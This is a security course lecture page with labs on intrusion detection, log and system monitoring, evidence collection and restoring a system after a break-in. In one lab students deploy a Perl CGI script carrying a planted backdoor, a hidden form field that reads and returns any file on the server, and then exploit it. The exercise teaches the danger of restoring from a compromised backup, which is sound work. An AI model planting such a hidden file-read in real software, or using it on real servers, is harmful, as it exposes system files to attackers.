Edward Parrish © 2003     

14. Intrusion Detection and Recovery

What We Will Cover


Log Tails

From Last Lab

Quiz Review


Overview

  • We have discussed how to protect ourselves from attack and a break-in
  • Our security model may fail
  • Important to detect the intrusion as early as possible
  • May be able to detect the attack before the attacker can gain access or do damage
  • We need to recover from attacks and return our sites to a safe and stable configuration

14.1: Detecting an Attack

Objectives

At the end of the lesson the student will be able to:

  • Monitor Logs for Strange Behavior
  • Determine if the System Is Acting Abnormally
  • Detect a Change in the System Configuration

  • The security model we have studied will decrease the risk of an attack
  • However, attacks will happen and security can fail
  • Important to detect attacks or security failures as soon as possible
  • To detect an attack, we try to understand what an attacker will attempt to do
  • Then we can look for and detect the activities associated with these attacks
  • Requires that we know the state of our network and server

14.1.1: Logs, Audits and Accounting

Logs

  • Most OS, network and server programs can log information
  • Errors, warning messages, and informational notices can be logged
  • Data in logs is an excellent resource for determining what is happening at our site
  • If an error is logged, it could indicate a configuration problem
  • Could also indicate someone is trying to modify a file they do not have permission to
  • Could be a user trying to login with the wrong password
  • Maybe the user did not know they did not have permissions to modify the file
  • Maybe the user made an error trying to type their password
  • Wise to check messages of this nature to be sure that you are not under attack
  • In addition, Web servers will log which documents have been requested and by whom
  • Allows you to see what is being served and who is connecting

Audits

  • Logs are not the only things that keep track of general system usage
  • Many systems have a means of auditing command usage or system events
  • Auditing can monitor when a file is opened, read, or written to
  • Can watch for when a process starts, ends, or forks a child process
  • Can record user activity such as when a user logs in or out
  • Logs notify you of errors or specific application-level transactions
  • Audits provide more detail about a transaction
  • Allows you to check all the steps leading up to a transaction

Accounting

  • Accounting calculates how much of the system resources are being used by each user
  • Original purpose was to tally up CPU, disk, and login time of each user for billing
  • Most system administrators do not bill their users for system use anymore
  • But accounting does provide a good way of determining how the system is being used and by whom
  • Accounting can serve as an additional log for security
  • Hackers will often try to gain superuser access
  • They then will modify the logs to hide their presence
  • May overlook the accounting information and change only the logs
  • Mismatch of data may help you to detect the intrusion

14.1.2: System and Network Usage

  • Every system has its own usage pattern
  • Popular Web sites may constantly get hits and CPU usage may almost always be at its maximum
  • A Web server that just keeps your resume online may only get a few hits a day
  • In any case, usage should be fairly consistent
  • What type of attack may be happening if your hit rate drops from 10,000/day to 10/day?
  • What if a user, who normally logs in on weekdays 8-5, starts logging in late at night?
  • To notice these types of patterns, we need to know what is normal behavior
  • Knowing typical use of your system and network will allow you to detect abnormal usage
  • Changes of this nature are good clues that a hacker may be present
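
To turn the questions above into a repeatable check, here is an added Python example (not part of the original lesson) that parses Apache access_log lines in the common log format, flags clients drawing repeated "not found" responses, and lists authenticated users seen outside a normal 8-to-5 window. The log lines are constructed for illustration, and the thresholds and working-hours window are assumptions to tune to your own site's baseline.

```python
import re
from collections import Counter
from datetime import datetime

# Apache common log format: client ident authuser [time] "request" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)')

# Constructed sample in the shape of the lab's access_log (not real traffic)
SAMPLE_LOG = """\
10.0.0.5 - - [16/Jul/2003:14:02:10 -0700] "GET /index.html HTTP/1.0" 200 1245
10.0.0.5 - - [16/Jul/2003:14:02:11 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326
10.0.0.9 - alice [16/Jul/2003:15:30:00 -0700] "POST /cgi-bin/webpage.pl HTTP/1.0" 200 512
192.0.2.77 - - [16/Jul/2003:23:41:02 -0700] "GET /admin/ HTTP/1.0" 404 284
192.0.2.77 - - [16/Jul/2003:23:41:03 -0700] "GET /backup/ HTTP/1.0" 404 284
192.0.2.77 - - [16/Jul/2003:23:41:04 -0700] "GET /old/index.html HTTP/1.0" 404 284
10.0.0.9 - alice [17/Jul/2003:02:17:45 -0700] "GET /private/ HTTP/1.0" 200 900
this line is damaged and must not stop the check
"""

def parse_access_log(text):
    """Return (client, authuser, timestamp, request, status) for each well-formed line."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip lines that do not parse
        client, user, ts, request, status, _ = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        entries.append((client, user, when, request, int(status)))
    return entries

def probing_clients(entries, min_404=3):
    """Clients that drew at least min_404 'not found' responses: someone guessing paths."""
    misses = Counter(client for client, _, _, _, status in entries if status == 404)
    return {c: n for c, n in misses.items() if n >= min_404}

def after_hours_users(entries, start=8, end=17):
    """Authenticated users active outside the normal working window [start, end)."""
    return sorted({user for _, user, when, _, _ in entries
                   if user != "-" and not (start <= when.hour < end)})

if __name__ == "__main__":
    log = parse_access_log(SAMPLE_LOG)
    print("possible probing:", probing_clients(log))
    print("after-hours users:", after_hours_users(log))
```

Run it against a copy of your own access_log (not the live file, which the intruder may be editing) and compare the output with what you know to be normal for your site.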


Lab Exercise 14.1

Use the next 10 minutes to complete the following.

  1. Start a text file named exercise14.txt
    Will be adding to this file during the lesson -- save it often.
  2. Prepare the exercise header as described in the HowTo on submitting exercises
  3. Label this exercise: Lab 14.1
  4. Perform the following exercises and answer the questions.

Exercises and Questions

    Monitor Logs for Strange Behavior

    Use your system's find file procedure to locate all file names containing the word log.

    find / -name "*.log"

  1. Which files did you find?
     Note that most system log files are located in /var/log and its subdirectories.

    If not already started, then start your Web server.

    Examine the Web server's log files and then load the default page.

    cd /usr/local/apache2/logs
    cat access_log

  2. What information was logged after loading the default page?
     cat access_log

    Attempt to load a page that does not exist on the Web server.

  3. What information was logged?
     cat access_log
     cat error_log

    Submit an online form whose data is processed by a CGI script on the Web server. See Lab 11.3 for an example form and script.

  4. What information was logged?
     cat access_log
     cat referer_log

    Stop and restart the Web server.

  5. What information was logged after restarting the Web server?
     cat error_log

    Log in as the superuser, if not already logged in as such, and attempt to edit the Web server's log files manually.

  6. Are you able to edit the log files?

    Determine if the System Is Acting Abnormally

    Using the various tools available on your system, answer the following questions. For UNIX some tools you can use are netstat, vmstat, iostat, sar, ps, and uptime. Windows 95/98/NT have tools such as a system monitor.

  7. What is the average load on the system?
     uptime
  8. How much CPU and memory is the system consuming?
     vmstat
     or
     top
  9. How many connections are established to the Web server?
     ps -ef | grep httpd
  10. What processes are currently running on the system?
     ps -ef
  11. Which users are currently logged in?
     who

    Detect a Change in the System Configuration

    Examine and compare the file attributes of the Web server's log files, a compiled executable program file, and the configuration file for the Web server.

    ls -l /usr/local/apache2/logs/access_log
    ls -l /usr/local/apache2/bin/httpd
    ls -l /usr/local/apache2/conf/httpd.conf

  12. Which file attributes are kept track of and what are their values?

    Make a minor change to the Web server's configuration (httpd.conf) and load the default page after restarting the Web server.

  13. What has changed about each file's attributes?
  14. What do you expect the attributes to look like in a month?
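
The ls -l comparison in this exercise can be automated. This added Python example (not from the course) records the attributes ls -l shows plus a SHA-256 hash of each watched file and reports which attributes of which files changed against a saved baseline; its demo() function repeats the lab's experiment on a throwaway httpd.conf. The Apache paths are the lab's and are assumed to exist on your machine.

```python
import hashlib
import os
import stat
import tempfile

# The files the lab compares with ls -l (paths taken from the lab, assumed here)
WATCHED = ["/usr/local/apache2/conf/httpd.conf", "/usr/local/apache2/bin/httpd",
           "/usr/local/apache2/logs/access_log"]

def file_record(path):
    """What ls -l shows (mode, owner, size, mtime) plus a SHA-256 of the contents."""
    st = os.stat(path)
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return {"mode": stat.filemode(st.st_mode), "uid": st.st_uid, "gid": st.st_gid,
            "size": st.st_size, "mtime": int(st.st_mtime), "sha256": h.hexdigest()}

def snapshot(paths):
    """Record each watched file; store the result off the host so it cannot be edited."""
    return {p: (file_record(p) if os.path.exists(p) else None) for p in paths}

def compare(baseline, current):
    """{path: [changed attributes]} for every file that no longer matches the baseline."""
    changes = {}
    for path, old in baseline.items():
        new = current.get(path)
        if old is None or new is None:
            if old != new:
                changes[path] = ["missing" if new is None else "appeared"]
        else:
            diff = [k for k in old if old[k] != new[k]]
            if diff:
                changes[path] = diff
    return changes

def demo():
    """Baseline a throwaway httpd.conf, make the lab's minor change, then compare."""
    conf = os.path.join(tempfile.mkdtemp(), "httpd.conf")
    with open(conf, "w") as f:
        f.write("Listen 80\nServerName www.example.com\n")
    baseline = snapshot([conf])
    with open(conf, "a") as f:
        f.write("ServerAdmin webmaster@example.com\n")
    return {os.path.basename(p): v for p, v in compare(baseline, snapshot([conf])).items()}

if __name__ == "__main__":
    print(demo())              # expect size and sha256 (and mtime once a second has passed)
    print(snapshot(WATCHED))   # save this output off-host and compare against it later
```

The log file is expected to change with every request, but the httpd binary and httpd.conf should only change when you change them; a hash change you did not make is the clue the lesson is pointing at.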

14.2: Recovering from an Attack

Objectives

At the end of the lesson the student will be able to:

  • Collect evidence for prosecution
  • Report an attack
  • Properly restore to a safe configuration

  • There is always the possibility that your security will be compromised
  • If so, an intruder may gain superuser access
  • At this point the intruder has full control and can do anything to the system
  • When this happens, you must reinstall the operating system to be safe

14.2.1: Before You Reinstall

  • Ultimately, reinstalling will be necessary if your security is breached
  • Must decide if you want to pursue the hacker and try to prosecute him or her
  • To pursue, you will want to gather evidence first
  • Reinstalling removes all traces of a hacker
  • Before reinstalling, save log information and files that were modified

To Catch a Thief

  • If at all possible, attempt to catch the hacker in the act of breaking in and tampering with the system
  • If you abruptly kill the hacker’s connection into the machine, he will suspect that you are onto him
  • Difficult to sit idly by while a hacker is viewing sensitive data or deleting important files
  • One solution is to create a decoy machine without any sensitive data
  • Allows you the time needed to gather your evidence without having to worry about what the hacker is doing to your machine.

14.2.2: Reporting the Attack

  • You may want to report an attack
  • Others may have experienced an attack similar to yours
  • Each site can leverage off the others to build their legal case or merely learn from each other's mistakes

Backtracking

  • The hacker most likely will be masquerading as someone else
  • Probably will be attacking your site from another site that has been compromised
  • Should get in contact with the other site’s system administrator to gather information on that end
  • The administrator may be unaware that he or she has a hacker present
  • The other system administrator may need to contact another site himself or herself
  • Slowly you can work backwards to track down the physical location of the hacker

Working With Your ISP

  • Should also send a report to your own ISP
  • Most, if not all, attacks are unlawful (Title 18, United States Code)
  • Some ISPs are very responsive to abuse and will cooperate and take appropriate action
  • Unfortunately, many ISPs just don't care
  • If they don't help you then choose another provider who will

Do Not Commit This Damaging Error

  • Whatever you do, don't ever try to attack back
  • Not only is this illegal and immature, it's probably futile
  • Only a real moron would attack you without first making sure he or she is immune to attacks


Lab Exercise 14.2

Use the next 10 minutes to complete the following. Note that some of these exercises have been modified from those in the text book.

    Label this exercise: Lab 14.2

    Collect Evidence for Prosecution

    The evidence to be obtained should consist of copies of modified files, logs, and a step-by-step trace of the hacker's actions.

  1. Without knowing which files were definitely modified, what could you do to gather this evidence?
     find / -mount -mtime -1
  2. What tool can be used to log a hacker's step-by-step actions?
     Note: a common tool for UNIX systems is acctcom. Unfortunately, we do not have this tool installed on our machines. You can get some information using sar.

    Report an Attack

    Go to the CERT/CC's Web site and click the link for reporting an incident.

  3. What is required by the CERT/CC when reporting an incident?

    Click the CERT/CC's link to incident reporting guidelines.

  4. Who else does the CERT/CC suggest you report an incident to?

    Properly Restore to a Safe Configuration

    Assume that you are recovering from an intrusion where superuser access was gained. You have already reinstalled the operating system and all third-party applications you use. You now decide to restore your Web server documents and CGI programs and scripts from a backup. Save the following script to your cgi-bin directory as if it were a script you restored. Name the script webpage.pl and use the form from the link below to access your new script.

#!/usr/bin/perl
# Read the POSTed form body and decode it into the %ARGS hash
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
$buflen = length($buffer);
if ($buflen > 0) {
  @pairs = split(/&/, $buffer);
  foreach $pair (@pairs) {
    ($name, $value) = split(/=/, $pair);
    $value =~ tr/+/ /;                                            # '+' encodes a space
    $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;  # decode %XX escapes
    $ARGS{$name} = $value;
  }
}
# Build the welcome page from the fname and lname form fields
print "Content-type: text/html\n\n";
print "<HTML>\n";
print "<HEAD>\n";
print " <TITLE>$ARGS{fname} $ARGS{lname}</TITLE>\n";
print "</HEAD>\n";
print "<BODY BGCOLOR=\"#ffffff\">\n";
print "<CENTER>\n";
print "Welcome to the home page of...\n<BR>\n";
print "<FONT SIZE=+4 COLOR=red>";
print "<BLINK>$ARGS{fname} $ARGS{lname}</BLINK></FONT>\n";
print "</CENTER>\n";
# The "gift": whatever file is named in a hidden backdoor field is opened
# (with a leading /) and its entire contents are echoed back to the browser
if($ARGS{backdoor}) {
  print "<PRE>\n";
  open(AFILE, "/$ARGS{backdoor}");
  while(<AFILE>) { print; };
  close(AFILE);
  print "</PRE>\n";
}
print "</BODY>\n";
print "</HTML>\n";

Save the script from here in /var/www/cgi-bin as webpage.pl. Do not forget to set the file permissions to allow script execution.

chmod +x webpage.pl

Use the form here.

  1. What does the script return when you submit the form data?
  2. Now modify your HTML form to also POST a HIDDEN variable named backdoor whose value is the fully qualified path to a file. The modified form is available here.

  3. What does the script return now when you submit the form that sends the additional HIDDEN variable?
  4. Notice the "gift" left behind in the following section of code:

    if($ARGS{backdoor}) {
      print "<PRE>\n";
      open(AFILE, "/$ARGS{backdoor}");
      while(<AFILE>) { print; };
      close(AFILE);
      print "</PRE>\n";
    }
    
  5. What does this tell you about the state of your system?
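
The point of this exercise is that a backup taken after the intrusion restores the intruder's change along with your own files. This added Python example (not part of the lesson) scans a restored Perl CGI script for open() calls whose filename interpolates request data, which is exactly the pattern of the "gift" above. The script text is a constructed copy of the relevant part of webpage.pl with one ordinary open() of a fixed path added, and the list of hash names is an assumption to extend for your own scripts.

```python
import re

# Constructed copy of the file-reading part of the restored webpage.pl (from the lab),
# with one ordinary open() of a fixed path added so the checker has something to ignore
RESTORED_SCRIPT = r'''#!/usr/bin/perl
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
  ($name, $value) = split(/=/, $pair);
  $ARGS{$name} = $value;
}
open(LOG, ">>/usr/local/apache2/logs/webpage_log");
print "Content-type: text/html\n\n";
if($ARGS{backdoor}) {
  print "<PRE>\n";
  open(AFILE, "/$ARGS{backdoor}");
  while(<AFILE>) { print; };
  close(AFILE);
}
'''

# Hash names hand-written CGI scripts commonly use for decoded request data, plus
# %ENV (QUERY_STRING, HTTP_* headers). Assumed names: extend for your own scripts.
PARAM_HASHES = ("ARGS", "FORM", "in", "query", "ENV")
OPEN_RE = re.compile(r'\bopen\s*\(\s*([^,]+),\s*(.+)\)')
PARAM_RE = re.compile(r'\$(' + "|".join(PARAM_HASHES) + r')\{')

def find_tainted_opens(source):
    """(line number, line) for every open() whose filename interpolates request data."""
    hits = []
    for n, line in enumerate(source.splitlines(), 1):
        m = OPEN_RE.search(line)
        if m and PARAM_RE.search(m.group(2)):     # group(2) is the filename expression
            hits.append((n, line.strip()))
    return hits

def scan_file(path):
    """Run the same check over a script restored from backup before it goes into cgi-bin."""
    with open(path) as f:
        return find_tainted_opens(f.read())

if __name__ == "__main__":
    for n, line in find_tainted_opens(RESTORED_SCRIPT):
        print(f"line {n}: {line}")
```

A hit means the script reads a file chosen by whoever submits the form; compare the flagged file against a copy you know predates the intrusion, or discard the backup.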

Wrap Up

  • When class is over, please shut down your computer
  • You may complete unfinished exercises at any time before the next class.
  • Be sure to submit the file to the instructor before the beginning of the next class to receive credit.
  • Instructions on submitting exercises are available from the HowTo's page.


Last Updated: 7/16/2003 4:45:45 PM